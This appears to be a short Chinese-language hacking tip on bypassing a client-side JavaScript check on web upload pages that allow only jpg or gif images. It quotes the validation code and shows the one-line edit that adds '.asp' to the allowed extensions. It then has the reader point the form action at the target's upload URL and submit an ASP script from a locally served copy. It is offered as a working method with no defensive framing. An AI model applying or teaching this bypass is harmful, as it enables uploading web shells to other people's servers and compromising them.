一般用于直接扫到的上传页面,名称是:上传图片,上传asp、asa等脚本时提示“请选择jpg或gif文件!”
这时通过这个方法一般都能成功,首先保存到本地1.asp 放到小旋风的目录下,然后找到以下这段代码:
alert("请点击浏览按钮,选择您要上传的jpg或gif文件!")
myform.file1.focus;
return (false);
}
else
{
str= myform.file1.value;
strs=str.toLowerCase();
lens=strs.length;
extname=strs.substring(lens-4,lens);
if(extname!=".jpg" && extname!=".gif")
{
alert("请选择jpg或gif文件!");
看到这句代码:if(extname!=".jpg" && extname!=".gif") 改为: if(extname!=".jpg" && extname!=".gif" && extname!=".asp")
然后补充完整上传地址,action=这里,然后网页打开127.0.0.1 直接上传asp文件就可以了。